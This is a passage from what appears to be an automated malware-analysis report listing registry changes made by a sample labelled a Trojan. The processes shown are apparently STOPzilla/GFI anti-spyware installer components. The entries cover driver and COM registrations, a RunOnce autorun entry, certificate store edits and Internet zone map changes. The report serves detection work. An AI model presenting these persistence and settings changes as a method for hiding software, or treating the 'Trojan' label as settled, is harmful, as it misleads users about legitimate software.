"FSFilter Content Screener" = "02 00 00 00 01 00 00 00 02 00 00 00"
[HKLM\System\CurrentControlSet\services\SBFWIMCLMP]
"AlwaysSecure" = "0"
[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0016]
"*IfType" = "1"
[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0017\Linkage]
"RootDevice" = "{A6D1A1FB-3CC9-4C17-A9BC-B98F22A69FD4}, NdisWanIpv6"
[HKLM\System\CurrentControlSet\services\sbapifs\Instances]
"DefaultInstance" = "ActiveProtection"
[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0016]
"NetCfgInstanceId" = "{0AAEF71A-F2DB-488E-86C0-8BA7E633F590}"
[HKLM\System\CurrentControlSet\services\SBFWIMCLMP]
"StatInspEnabled" = "1"
[HKLM\SYSTEM\Setup\SetupapiLogStatus]
"setupapi.dev.log" = "4096"
[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0012]
"ComponentID" = "sb_sbfwimclmp"
[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0014\Linkage]
"Export" = "\Device\{AFB7E826-C56D-4AAB-B128-DC1EACFEE45E}"
[HKLM\System\CurrentControlSet\Control\Nsi\{eb004a11-9b1a-11d4-9123-0050047759bc}\10]
"0000000200000100" = "AE 01 84 04 32 00 4C 00 6F 00 63 00 61 00 6C 00"
[HKLM\System\CurrentControlSet\Control\Network\NetCfgLockHolder]
"(Default)" = "SBFWIM_Installer"
[HKLM\System\CurrentControlSet\services\NDIS\IfTypes\1]
"IfType" = "1"
[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0012]
"DeviceInstanceID" = "ROOT\SB_SBFWIMCLMP\0000"
[HKLM\System\CurrentControlSet\Control\Network\NDISTempKey\Ndi]
"Service" = "SBFWIMCLMP"
[HKLM\System\CurrentControlSet\services\SBFWIMCL\Parameters\Adapters\NdisWanBh]
"UpperBindings" = "\Device\{0AAEF71A-F2DB-488E-86C0-8BA7E633F590}"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer]
"GlobalAssocChangedCounter" = "56"
[HKCU\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32]
"tcpipcfg.dll,-50001" = "Transmission Control Protocol/Internet Protocol. The default wide area network protocol that provides communication across diverse interconnected networks."
[HKLM\System\CurrentControlSet\Control\Network\{4d36e974-e325-11ce-bfc1-08002be10318}\{96E03330-1F76-4A96-B984-03D38593DA1B}]
"ComponentID" = "sb_SBFWIMcl"
[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0017]
"FilterInfId" = "sb_sbfwimcl"
[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0014\Linkage]
"RootDevice" = "{AFB7E826-C56D-4AAB-B128-DC1EACFEE45E}, NdisWanIp"
[HKLM\System\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}\Descriptions]
"GFI Software Firewall NDIS IM Filter Miniport" = "1"
[HKCU\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32]
"lltdres.dll,-4" = "Used to discover and locate other PCs, devices, and network infrastructure components on the network. Also used to determine network bandwidth."
[HKLM\System\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}\{A6D1A1FB-3CC9-4C17-A9BC-B98F22A69FD4}\Connection]
"DefaultNameResourceId" = "1801"
[HKLM\System\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}\{0AAEF71A-F2DB-488E-86C0-8BA7E633F590}\Connection]
"DefaultNameResourceId" = "1801"
[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0008]
"NetCfgInstanceId" = "{360A33D7-AC4E-4F80-8799-45E95D991A99}"
[HKLM\System\CurrentControlSet\Control\Network\{4d36e974-e325-11ce-bfc1-08002be10318}\{96E03330-1F76-4A96-B984-03D38593DA1B}\Ndi\Interfaces]
"UpperRange" = "noupper"
[HKLM\System\CurrentControlSet\services\sbapifs\Instances\ActiveProtection]
"Flags" = "2"
[HKLM\System\CurrentControlSet\Control\Network\{4d36e974-e325-11ce-bfc1-08002be10318}\{96E03330-1F76-4A96-B984-03D38593DA1B}\Ndi]
"FilterDeviceInfId" = "sb_SBFWIMclmp"
[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0012]
"*IfType" = "1"
[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0016\Linkage]
"FilterList" = "{0AAEF71A-F2DB-488E-86C0-8BA7E633F590}-{B5F4D659-7DAA-4565-8E41-BE220ED60542}-0000"
[HKLM\System\CurrentControlSet\Enum\Root\SB_SBFWIMCLMP\0003\Device Parameters]
"InstanceIndex" = "4"
[HKLM\System\CurrentControlSet\Control\Network\{4d36e974-e325-11ce-bfc1-08002be10318}\{96E03330-1F76-4A96-B984-03D38593DA1B}\Ndi]
"TimeStamp" = "DF 07 04 00 06 00 19 00 01 00 10 00 38 00 3F 03"
[HKCU\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32]
"lltdres.dll,-3" = "Allows this PC to be discovered and located on the network."
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"GrpConv" = "grpconv -o"
The Trojan deletes the following registry key(s):
[HKLM\System\CurrentControlSet\services\WfpLwf\Parameters\Adapters\{4AB0D2BA-E805-472C-9283-2A108EC5CAE2}]
[HKLM\System\CurrentControlSet\Control\Network\NDISTempKey\Ndi]
[HKLM\System\CurrentControlSet\services\Psched\Parameters\Adapters\{360A33D7-AC4E-4F80-8799-45E95D991A99}\{B5F4D659-7DAA-4565-8E41-BE220ED60542}-0000]
[HKLM\System\CurrentControlSet\services\Psched\Parameters\Adapters\{4AB0D2BA-E805-472C-9283-2A108EC5CAE2}\{B5F4D659-7DAA-4565-8E41-BE220ED60542}-0000]
[HKLM\System\CurrentControlSet\services\Psched\Parameters\Adapters\{360A33D7-AC4E-4F80-8799-45E95D991A99}]
[HKLM\System\CurrentControlSet\services\Psched\Parameters\Adapters\{B1422D78-82BA-4FD0-B38A-6203899A1A72}]
[HKLM\System\CurrentControlSet\Control\Network\NetCfgLockHolder]
[HKLM\System\CurrentControlSet\services\Psched\Parameters\Adapters\{B1422D78-82BA-4FD0-B38A-6203899A1A72}\{B5F4D659-7DAA-4565-8E41-BE220ED60542}-0000]
[HKLM\System\CurrentControlSet\services\Psched\Parameters\Adapters\{0D252192-084F-4C37-8DED-14986BA82F63}]
[HKLM\System\CurrentControlSet\services\WfpLwf\Parameters\Adapters\{4AB0D2BA-E805-472C-9283-2A108EC5CAE2}\{B70D6460-3635-4D42-B866-B8AB1A24454C}-0000]
[HKLM\System\CurrentControlSet\services\Psched\Parameters\Adapters\{4AB0D2BA-E805-472C-9283-2A108EC5CAE2}]
[HKLM\System\CurrentControlSet\Control\Network\NDISTempKey]
[HKLM\System\CurrentControlSet\services\Psched\Parameters\Adapters\{0D252192-084F-4C37-8DED-14986BA82F63}\{B5F4D659-7DAA-4565-8E41-BE220ED60542}-0000]
The Trojan deletes the following value(s) in system registry:
[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0007\Linkage]
"FilterList"
[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0016\Linkage]
"Route"
[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0014\Linkage]
"Bind"
"BindPath"
[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0016\Linkage]
"Bind"
[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0005\Linkage]
"FilterList"
[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0008\Linkage]
"FilterList"
[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0014\Linkage]
"Route"
[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0012\Linkage]
"Route"
[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0017\Linkage]
"Route"
[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0006\Linkage]
"FilterList"
[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0016\Linkage]
"BindPath"
[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0017\Linkage]
"BindPath"
[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0012\Linkage]
"Bind"
"BindPath"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\PnPSysprep\ServiceStartTypeBackup]
"SBFWIMCLMP"
[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0017\Linkage]
"Bind"
The process SBAMSvc.exe:3448 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\5A1C102CCFDFDB5468E601489DB25A5E\Usage]
"STOPzilla_Files" = "1184432146"
The Trojan deletes the following value(s) in system registry:
The Trojan disables automatic startup of the application by deleting the following autorun value:
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run]
"sbamui"
The process %original file name%.exe:1912 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\SystemCertificates\CA\Certificates\27AC9369FAF25207BB2627CEFACCBE4EF9C319B8]
"Blob" = "03 00 00 00 01 00 00 00 14 00 00 00 27 AC 93 69"
[HKCU\Software\Classes\Local Settings\MuiCache\2D\52C64B7E]
"LanguageList" = "en-US, en"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\SystemCertificates\CA\Certificates]
"27AC9369FAF25207BB2627CEFACCBE4EF9C319B8"
The process runonce.exe:3092 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
The Trojan disables automatic startup of the application by deleting the following autorun value:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"GrpConv"
The process runonce.exe:2736 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
The Trojan disables automatic startup of the application by deleting the following autorun value:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"GrpConv"
The process DrvInst.exe:2212 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKU\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E]
"LanguageList" = "en-US, en"
The process DrvInst.exe:1680 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKU\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E]
"LanguageList" = "en-US, en"
The process STOPzilla.exe:3836 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\5A1C102CCFDFDB5468E601489DB25A5E\Usage]
"STOPzilla_Files" = "1184432178"
[HKCU\Software\Microsoft\Direct3D\MostRecentApplication]
"Name" = "STOPzilla.exe"
The process RUNDLL32.exe:3528 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\System\CurrentControlSet\services\sbapifs\Instances\ActiveProtection]
"Altitude" = "268000"
[HKLM\System\CurrentControlSet\services\eventlog\System\Anti-Spyware Filter]
"EventMessageFile" = "%SystemRoot%\System32\drivers\sbapifs.sys"
[HKLM\System\CurrentControlSet\services\sbapifs\Instances\ActiveProtection]
"Flags" = "2"
[HKLM\System\CurrentControlSet\services\sbapifs]
"SupportedFeatures" = "3"
[HKLM\System\CurrentControlSet\services\sbapifs\Instances]
"DefaultInstance" = "ActiveProtection"
[HKLM\System\CurrentControlSet\Control\GroupOrderList]
"FSFilter Content Screener" = "02 00 00 00 01 00 00 00 02 00 00 00"
[HKLM\System\CurrentControlSet\services\eventlog\System\Anti-Spyware Filter]
"TypesSupported" = "7"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\PnPSysprep\ServiceStartTypeBackup]
"sbapifs"
The process regsvr32.exe:3500 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCR\Interface\{9284DD19-028C-4588-8FC1-E8E0E7EEDC8F}]
"(Default)" = "_ISBRegistrationEvents"
[HKCR\Interface\{AE2DC33B-E9FD-42E6-BFAC-F3B43306FE52}\ProxyStubClsid32]
"(Default)" = "{C2582700-05E6-4FD2-9EF9-80B13128624C}"
[HKCR\Interface\{B322F428-C4DA-45A8-95AE-AA9A3C785067}\NumMethods]
"(Default)" = "29"
[HKCR\Interface\{0DEADC83-C6F7-4DAC-B89E-EF9F7D1EEF51}]
"(Default)" = "_ISBThreatDefinitionsEvents"
[HKCR\Interface\{141E16A7-2474-4DF3-9BE1-3D3D489DC327}]
"(Default)" = "ISBWebFilter"
[HKCR\Interface\{6220D30C-21D3-48CC-9C64-A3DD5A87E763}]
"(Default)" = "_ISBScanControlEvents"
[HKCR\Interface\{4BDB78E2-477D-4F6C-96AC-FBF1E125115B}]
"(Default)" = "_ISBLanGuardEvents"
[HKCR\Interface\{8C01622E-EBAD-409A-A748-A68F3CB9C538}]
"(Default)" = "ISBHIPS"
[HKCR\Interface\{6220D30C-21D3-48CC-9C64-A3DD5A87E763}\NumMethods]
"(Default)" = "8"
[HKCR\Interface\{4BDB78E2-477D-4F6C-96AC-FBF1E125115B}\NumMethods]
"(Default)" = "5"
[HKCR\Interface\{B322F428-C4DA-45A8-95AE-AA9A3C785067}]
"(Default)" = "ISBService"
[HKCR\Interface\{E426C725-B8CE-406A-9171-F59471F9600B}\ProxyStubClsid32]
"(Default)" = "{C2582700-05E6-4FD2-9EF9-80B13128624C}"
[HKCR\Interface\{BBED8229-EB89-4853-B66A-391DA146CECE}\NumMethods]
"(Default)" = "24"
[HKCR\Interface\{0720C092-F3DA-46F7-BDC9-74863B797A07}\ProxyStubClsid32]
"(Default)" = "{C2582700-05E6-4FD2-9EF9-80B13128624C}"
[HKCR\Interface\{E0E5ADF1-2D68-4A49-A67E-02D1156A1A42}]
"(Default)" = "ISBLogger"
[HKCR\Interface\{EECD4897-DD51-476D-9913-B9C808885F03}]
"(Default)" = "_ISBWebFilterEvents"
[HKCR\Interface\{0A0F62CD-9519-44AC-9327-E6E737448D07}]
"(Default)" = "_ISBFirewallEvents"
[HKCR\Interface\{F4198087-BE24-4537-98B7-5310A4A6FA8A}\ProxyStubClsid32]
"(Default)" = "{C2582700-05E6-4FD2-9EF9-80B13128624C}"
[HKCR\Interface\{F4198087-BE24-4537-98B7-5310A4A6FA8A}]
"(Default)" = "ISBActiveProtection"
[HKCR\Interface\{0B3304B4-917A-4F54-AAC4-73EECFB20C53}\ProxyStubClsid32]
"(Default)" = "{C2582700-05E6-4FD2-9EF9-80B13128624C}"
[HKCR\Interface\{B322F428-C4DA-45A8-95AE-AA9A3C785067}\ProxyStubClsid32]
"(Default)" = "{C2582700-05E6-4FD2-9EF9-80B13128624C}"
[HKCR\Interface\{91C0198E-F2FD-4CC7-8858-C2272DC99C75}\ProxyStubClsid32]
"(Default)" = "{C2582700-05E6-4FD2-9EF9-80B13128624C}"
[HKCR\Interface\{245A13CA-25A4-4408-B9FD-5E5A17716023}\NumMethods]
"(Default)" = "11"
[HKCR\CLSID\{C2582700-05E6-4FD2-9EF9-80B13128624C}\InProcServer32]
"(Default)" = "%Program Files% (x86)\STOPzilla\x64\sbamsvcps.dll"
[HKCR\Interface\{4BDB78E2-477D-4F6C-96AC-FBF1E125115B}\ProxyStubClsid32]
"(Default)" = "{C2582700-05E6-4FD2-9EF9-80B13128624C}"
[HKCR\Interface\{9284DD19-028C-4588-8FC1-E8E0E7EEDC8F}\ProxyStubClsid32]
"(Default)" = "{C2582700-05E6-4FD2-9EF9-80B13128624C}"
[HKCR\Interface\{BF68F090-4866-4B78-A67E-41FA18C93090}\ProxyStubClsid32]
"(Default)" = "{C2582700-05E6-4FD2-9EF9-80B13128624C}"
[HKCR\Interface\{BBED8229-EB89-4853-B66A-391DA146CECE}\ProxyStubClsid32]
"(Default)" = "{C2582700-05E6-4FD2-9EF9-80B13128624C}"
[HKCR\Interface\{A9CA66D5-6D45-469F-83DB-B713E4BF3B95}]
"(Default)" = "ISBRegistration"
[HKCR\Interface\{46E40214-7877-40F1-8F13-6E57FD213D13}]
"(Default)" = "ISBWSC"
[HKCR\Interface\{5973BE92-0338-4FFA-BF58-1B0082BEAFD3}]
"(Default)" = "_ISBEmailAVEvents"
[HKCR\Interface\{8C01622E-EBAD-409A-A748-A68F3CB9C538}\NumMethods]
"(Default)" = "10"
[HKCR\Interface\{A9CA66D5-6D45-469F-83DB-B713E4BF3B95}\NumMethods]
"(Default)" = "11"
[HKCR\Interface\{BF68F090-4866-4B78-A67E-41FA18C93090}\NumMethods]
"(Default)" = "19"
[HKCR\Interface\{0720C092-F3DA-46F7-BDC9-74863B797A07}]
"(Default)" = "_ISBActiveProtectionEvents"
[HKCR\Interface\{245A13CA-25A4-4408-B9FD-5E5A17716023}]
"(Default)" = "ISBQuarantine"
[HKCR\Interface\{E0E5ADF1-2D68-4A49-A67E-02D1156A1A42}\NumMethods]
"(Default)" = "13"
[HKCR\Interface\{E426C725-B8CE-406A-9171-F59471F9600B}]
"(Default)" = "ISBThreatDefinitions"
[HKCR\Interface\{5973BE92-0338-4FFA-BF58-1B0082BEAFD3}\ProxyStubClsid32]
"(Default)" = "{C2582700-05E6-4FD2-9EF9-80B13128624C}"
[HKCR\Interface\{0A0F62CD-9519-44AC-9327-E6E737448D07}\NumMethods]
"(Default)" = "11"
[HKCR\Interface\{EECD4897-DD51-476D-9913-B9C808885F03}\NumMethods]
"(Default)" = "8"
[HKCR\Interface\{0B3304B4-917A-4F54-AAC4-73EECFB20C53}\NumMethods]
"(Default)" = "4"
[HKCR\Interface\{BBED8229-EB89-4853-B66A-391DA146CECE}]
"(Default)" = "ISBScanControl"
[HKCR\Interface\{0A0F62CD-9519-44AC-9327-E6E737448D07}\ProxyStubClsid32]
"(Default)" = "{C2582700-05E6-4FD2-9EF9-80B13128624C}"
[HKCR\Interface\{0B3304B4-917A-4F54-AAC4-73EECFB20C53}]
"(Default)" = "_ISBQuarantineEvents"
[HKCR\Interface\{BF68F090-4866-4B78-A67E-41FA18C93090}]
"(Default)" = "ISBLanGuard"
[HKCR\Interface\{F4198087-BE24-4537-98B7-5310A4A6FA8A}\NumMethods]
"(Default)" = "14"
[HKCR\Interface\{84D3A41D-769C-4190-94CD-CEBDA3EA4F33}\ProxyStubClsid32]
"(Default)" = "{C2582700-05E6-4FD2-9EF9-80B13128624C}"
[HKCR\Interface\{46E40214-7877-40F1-8F13-6E57FD213D13}\NumMethods]
"(Default)" = "5"
[HKCR\Interface\{EECD4897-DD51-476D-9913-B9C808885F03}\ProxyStubClsid32]
"(Default)" = "{C2582700-05E6-4FD2-9EF9-80B13128624C}"
[HKCR\Interface\{91C0198E-F2FD-4CC7-8858-C2272DC99C75}\NumMethods]
"(Default)" = "10"
[HKCR\Interface\{5973BE92-0338-4FFA-BF58-1B0082BEAFD3}\NumMethods]
"(Default)" = "6"
[HKCR\Interface\{0720C092-F3DA-46F7-BDC9-74863B797A07}\NumMethods]
"(Default)" = "8"
[HKCR\Interface\{84D3A41D-769C-4190-94CD-CEBDA3EA4F33}]
"(Default)" = "_ISBServiceEvents"
[HKCR\CLSID\{C2582700-05E6-4FD2-9EF9-80B13128624C}\InProcServer32]
"ThreadingModel" = "Both"
[HKCR\Interface\{C2582700-05E6-4FD2-9EF9-80B13128624C}\ProxyStubClsid32]
"(Default)" = "{C2582700-05E6-4FD2-9EF9-80B13128624C}"
[HKCR\Interface\{82C4A34B-7E1A-4AA6-9948-29F5616FB7DF}\NumMethods]
"(Default)" = "6"
[HKCR\Interface\{AE2DC33B-E9FD-42E6-BFAC-F3B43306FE52}]
"(Default)" = "_ISBHIPSEvents"
[HKCR\Interface\{0DEADC83-C6F7-4DAC-B89E-EF9F7D1EEF51}\ProxyStubClsid32]
"(Default)" = "{C2582700-05E6-4FD2-9EF9-80B13128624C}"
[HKCR\Interface\{6220D30C-21D3-48CC-9C64-A3DD5A87E763}\ProxyStubClsid32]
"(Default)" = "{C2582700-05E6-4FD2-9EF9-80B13128624C}"
[HKCR\Interface\{C2582700-05E6-4FD2-9EF9-80B13128624C}]
"(Default)" = "ISBEmailAV"
[HKCR\Interface\{82C4A34B-7E1A-4AA6-9948-29F5616FB7DF}\ProxyStubClsid32]
"(Default)" = "{C2582700-05E6-4FD2-9EF9-80B13128624C}"
[HKCR\Interface\{B3566D12-5895-4511-ADB2-125BFF23891E}\NumMethods]
"(Default)" = "4"
[HKCR\Interface\{5C3CCE0F-2E3E-485A-B9C8-5E66C2282F43}\NumMethods]
"(Default)" = "4"
[HKCR\CLSID\{C2582700-05E6-4FD2-9EF9-80B13128624C}]
"(Default)" = "PSFactoryBuffer"
[HKCR\Interface\{245A13CA-25A4-4408-B9FD-5E5A17716023}\ProxyStubClsid32]
"(Default)" = "{C2582700-05E6-4FD2-9EF9-80B13128624C}"
[HKCR\Interface\{E426C725-B8CE-406A-9171-F59471F9600B}\NumMethods]
"(Default)" = "15"
[HKCR\Interface\{F60343A9-2C06-49DB-8853-97234E477918}]
"(Default)" = "ISBFirewall"
[HKCR\Interface\{F60343A9-2C06-49DB-8853-97234E477918}\ProxyStubClsid32]
"(Default)" = "{C2582700-05E6-4FD2-9EF9-80B13128624C}"
[HKCR\Interface\{141E16A7-2474-4DF3-9BE1-3D3D489DC327}\ProxyStubClsid32]
"(Default)" = "{C2582700-05E6-4FD2-9EF9-80B13128624C}"
[HKCR\Interface\{5C3CCE0F-2E3E-485A-B9C8-5E66C2282F43}]
"(Default)" = "_ISBWSCEvents"
[HKCR\Interface\{B3566D12-5895-4511-ADB2-125BFF23891E}]
"(Default)" = "ISBVipre"
[HKCR\Interface\{AE2DC33B-E9FD-42E6-BFAC-F3B43306FE52}\NumMethods]
"(Default)" = "8"
[HKCR\Interface\{9284DD19-028C-4588-8FC1-E8E0E7EEDC8F}\NumMethods]
"(Default)" = "5"
[HKCR\Interface\{E0E5ADF1-2D68-4A49-A67E-02D1156A1A42}\ProxyStubClsid32]
"(Default)" = "{C2582700-05E6-4FD2-9EF9-80B13128624C}"
[HKCR\Interface\{46E40214-7877-40F1-8F13-6E57FD213D13}\ProxyStubClsid32]
"(Default)" = "{C2582700-05E6-4FD2-9EF9-80B13128624C}"
[HKCR\Interface\{C2582700-05E6-4FD2-9EF9-80B13128624C}\NumMethods]
"(Default)" = "18"
[HKCR\Interface\{84D3A41D-769C-4190-94CD-CEBDA3EA4F33}\NumMethods]
"(Default)" = "11"
[HKCR\Interface\{A9CA66D5-6D45-469F-83DB-B713E4BF3B95}\ProxyStubClsid32]
"(Default)" = "{C2582700-05E6-4FD2-9EF9-80B13128624C}"
[HKCR\Interface\{82C4A34B-7E1A-4AA6-9948-29F5616FB7DF}]
"(Default)" = "_ISBSoftwareUpdatesEvents"
[HKCR\Interface\{B3566D12-5895-4511-ADB2-125BFF23891E}\ProxyStubClsid32]
"(Default)" = "{C2582700-05E6-4FD2-9EF9-80B13128624C}"
[HKCR\Interface\{5C3CCE0F-2E3E-485A-B9C8-5E66C2282F43}\ProxyStubClsid32]
"(Default)" = "{C2582700-05E6-4FD2-9EF9-80B13128624C}"
[HKCR\Interface\{F60343A9-2C06-49DB-8853-97234E477918}\NumMethods]
"(Default)" = "27"
[HKCR\Interface\{91C0198E-F2FD-4CC7-8858-C2272DC99C75}]
"(Default)" = "ISBSoftwareUpdates"
[HKCR\Interface\{141E16A7-2474-4DF3-9BE1-3D3D489DC327}\NumMethods]
"(Default)" = "9"
[HKCR\Interface\{0DEADC83-C6F7-4DAC-B89E-EF9F7D1EEF51}\NumMethods]
"(Default)" = "6"
[HKCR\Interface\{8C01622E-EBAD-409A-A748-A68F3CB9C538}\ProxyStubClsid32]
"(Default)" = "{C2582700-05E6-4FD2-9EF9-80B13128624C}"
The process regsvr32.exe:1496 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCR\Interface\{F0558B4E-7949-4EC4-8DB8-F8E79D1C07AE}\TypeLib]
"Version" = "1.0"
[HKCR\SBAMOutlook.SBOutlookPlugIn\CLSID]
"(Default)" = "{E58A2D62-2CF0-4FD3-9C87-74966157CDDB}"
[HKCR\Interface\{9F8D3F3F-29DF-40C3-B09B-547A1E5C22E2}]
"(Default)" = "ISBOutlookPlugIn"
[HKCR\CLSID\{9F8D3F3F-29DF-40C3-B09B-547A1E5C22E2}]
"(Default)" = "PSFactoryBuffer"
[HKCR\CLSID\{926195BB-EF79-4201-A585-57E8CA8B9260}\ProgID]
"(Default)" = "GFI.SBOEPlugIn.1"
[HKCR\CLSID\{E58A2D62-2CF0-4FD3-9C87-74966157CDDB}\ProgID]
"(Default)" = "SBAMOutlook.SBOutlookPlugIn.1"
[HKCR\Interface\{F0558B4E-7949-4EC4-8DB8-F8E79D1C07AE}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\CLSID\{926195BB-EF79-4201-A585-57E8CA8B9260}\VersionIndependentProgID]
"(Default)" = "GFI.SBOEPlugIn"
[HKCR\CLSID\{E58A2D62-2CF0-4FD3-9C87-74966157CDDB}\TypeLib]
"(Default)" = "{F3C81931-7FBC-4E52-8BDE-20CB46534CB3}"
[HKCR\Interface\{E868ABBE-1502-4D7A-BDC2-E6BCDE75959B}\TypeLib]
"Version" = "1.0"
[HKCR\GFI.SBWLMailPlugIn\CLSID]
"(Default)" = "{A0695DC8-366E-4FEE-AC3C-A442E4E29C4E}"
[HKCR\GFI.SBOEPlugIn.1\CLSID]
"(Default)" = "{926195BB-EF79-4201-A585-57E8CA8B9260}"
[HKCR\CLSID\{A0695DC8-366E-4FEE-AC3C-A442E4E29C4E}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKLM\SOFTWARE\Nektra\OEAPI\Plugins]
"GFI" = "GFI.SBOEPlugIn"
[HKCR\SBAMOutlook.SBOutlookPlugIn.1]
"(Default)" = "SBOutlookPlugIn Class"
[HKCR\AppID\{AC7CD0E2-273C-4EAC-B873-904CE5E01472}]
"(Default)" = "SBOutlookExpress"
[HKCR\Interface\{F0558B4E-7949-4EC4-8DB8-F8E79D1C07AE}\TypeLib]
"(Default)" = "{F3C81931-7FBC-4E52-8BDE-20CB46534CB3}"
[HKCR\GFI.SBOEPlugIn]
"(Default)" = "SBOEPlugIn Class"
[HKCR\SBAMOutlook.SBOutlookPlugIn]
"(Default)" = "SBOutlookPlugIn Class"
[HKCR\GFI.SBOEPlugIn\CLSID]
"(Default)" = "{926195BB-EF79-4201-A585-57E8CA8B9260}"
[HKCR\CLSID\{A0695DC8-366E-4FEE-AC3C-A442E4E29C4E}\ProgID]
"(Default)" = "GFI.SBWLMailPlugIn.1"
[HKCR\Interface\{E868ABBE-1502-4D7A-BDC2-E6BCDE75959B}]
"(Default)" = "ISBOEPlugIn"
[HKCR\Interface\{9F8D3F3F-29DF-40C3-B09B-547A1E5C22E2}\NumMethods]
"(Default)" = "7"
[HKCR\SBAMOutlook.SBOutlookPlugIn\CurVer]
"(Default)" = "SBAMOutlook.SBOutlookPlugIn.1"
[HKCR\GFI.SBWLMailPlugIn.1\CLSID]
"(Default)" = "{A0695DC8-366E-4FEE-AC3C-A442E4E29C4E}"
[HKCR\Interface\{F0558B4E-7949-4EC4-8DB8-F8E79D1C07AE}\NumMethods]
"(Default)" = "7"
[HKCR\CLSID\{926195BB-EF79-4201-A585-57E8CA8B9260}\TypeLib]
"(Default)" = "{F3C81931-7FBC-4E52-8BDE-20CB46534CB3}"
[HKCR\Interface\{E868ABBE-1502-4D7A-BDC2-E6BCDE75959B}\TypeLib]
